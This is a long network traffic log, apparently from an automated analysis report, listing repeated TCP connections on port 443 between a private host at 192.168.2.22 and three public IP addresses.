                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
